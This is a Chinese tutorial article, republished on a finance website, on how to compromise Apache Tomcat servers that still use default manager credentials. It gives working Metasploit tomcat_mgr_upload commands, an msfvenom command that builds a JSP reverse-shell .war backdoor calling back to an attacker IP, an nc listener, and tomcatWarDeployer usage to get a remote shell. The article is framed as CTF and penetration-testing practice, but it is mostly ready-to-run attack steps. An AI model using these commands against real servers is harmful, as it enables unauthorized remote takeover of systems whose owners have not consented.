首页 | 财经 | 资源 | 理财 | 考研 | 职场 | 论文 | 资格 | 股票学院 |

股票学院: 股票入门 - 股票知识 - 股票术语 - 炒股技巧 - 选股技巧 - 跟庄技巧 - 炒股经验 - 投资策略 - K线图 - 均线 - 分时图 - 成交量 - 波浪理论 - 基本面分析 - 心理分析 - 涨停研究 - 趋势线 - 江恩理论 - MACD - KDJ - 技术指标 - 财经股票书籍在线阅读 - 金融类书籍下载 - 银行学院 - 保险学院 - 外汇学院 - 债券学院 - 股票学院 - 基金学院 - 港股学院 - 黄金学院

当前位置:天下金融网 > 金融云 > 文章正文

攻击Tomcat的多种姿势

时间:2019-02-12 09:48:53来源:嘶吼专业版作者:佚名

大家好,本文我想分享一下我的经验,如果你的Tomcat应用设置的是默认登陆凭证时(Tomcat:Tomcat)如何进行利用?当我在打CTF时,很多次我都发现目标主机上的Tomcat应用都是配置的默认登陆凭证,这有助于我们拿到主机的远程shell。因此,我感觉应该记录一下所有攻击Tomcat应用并获取远程主机webshell的方法。

目录

  • Tomcat经过身份验证的上传代码执行
  • 生成.war格式的后门
  • Tomcat war部署脚本
  • 生成JSP webshell

首先使用nmap进行扫描,看看8080端口是否运行着Tomcat服务

  1. nmap -sV -p8080 192.168.1.101 

攻击Tomcat的多种姿势

从扫描结果可以看到,8080端口是开放的,运行着Apache Tomcat。我们用浏览器来访问以下目标IP地址,后面带上端口号。我们可以看到一个HTTP身份认证页面来登陆Tomcat管理后台。

攻击Tomcat的多种姿势

Tomcat经过身份验证的上传代码执行

目标服务器是Apache Tomcat,而且泄露了管理后台,我们可以利用一个模块来执行payload。这个payload作为一个war文件上传,这个payload包含了一个jsp应用,该jsp应用使用POST方式向/manager/html/upload组件发起请求。请注意,根据目标主机的不同,这个payload的设置也会有所不同。比如,如果你的目标主机是Windows,那么你得使用原生的windows payload。

  1. use exploit/multi/http/tomcat_mgr_upload 
  2. msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101 
  3. msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080 
  4. msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat 
  5. msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat 
  6. msf exploit(multi/http/tomcat_mgr_upload) > exploit 

如图所示,我们可以看到我们已经拿下了目标主机的meterpreter会话:

攻击Tomcat的多种姿势

生成.war格式的后门

攻击Tomcat的多种姿势

我们可以使用msfvenom来为java和jsp payload生成一个.war格式的后门。你要做的就是按照下面提供的语法来创建一个.war格式的文件并启动nc进行监听:

  1. Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name] 
  2. msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=1234 -f war > shell.war 
  3. nc -lvp 1234 

攻击Tomcat的多种姿势

现在,使用默认的登陆凭证Tomcat:tomcat登陆到Tomcat管理后台中,登陆成功后你就能看到管理员面板,在这里你可以上传.war文件。

如图所示,你可以看到我已经在截图中圈出了“浏览恶意的shell.war文件进行部署”。一旦你成功上传你的war文件,在应用表中,你可以看到一个跟你war文件名字相同的目录。

想要执行你的war文件,你需要进入该目录并点击war文件,或者是直接在URL里访问。

一旦你执行了war文件,你就可以通过nc获得一个反向连接。

攻击Tomcat的多种姿势

耶,我们又一次获得了一个远程主机的webshell。

攻击Tomcat的多种姿势

Tomcat War部署脚本

这是一个渗透测试工具,旨在利用Apache Tomcat凭证以自动生成和部署JSP后门,一旦之后触发这个后门,就会返回一个令人大快人心的shell了(不管是通过web gui还是监听绑定到目标主机的端口或者是回连到攻击者的反向TCP payload)。

实际上,它会动态的生成JSP后门war包,然后使用pentester提供的有效的HTTP身份认证凭证(或者自定义凭证,一般都是Tomcat:tomcat)登陆到Tomcat管理界面中并且将其部署到Tomcat应用程序中。

部署脚本你可以在这里进行下载:

https://github.com/mgeeky/tomcatWarDeployer

  1. git clone https://github.com/mgeeky/tomcatWarDeployer 
  2. cd tomcatWarDeployer 
  3. ls 

攻击Tomcat的多种姿势

现在再按照语法来对目标主机进行漏洞利用,不用再手动上传war文件了。

  1. Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port] 
  2. ./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080 

相关阅读

焦点图文

关于我们 | 广告服务 | 商务合作 | 网站地图

版权所有 Copyright(C)2018-2020 苏州骐云跃网络科技有限公司,未经授权禁止复制或建立镜像,否则将依法追究法律责任!
声明:我们不做任何形式的代客理财及投资指导,凡是以天下金融网名义做股票推荐的行为均属违法!
广告商的言论与行为均与天下金融网无关!股市有风险,投资需谨慎。
苏公网安备 32050502000166号
苏ICP备14018528号
商务合作:联系我们

天下金融网版权所有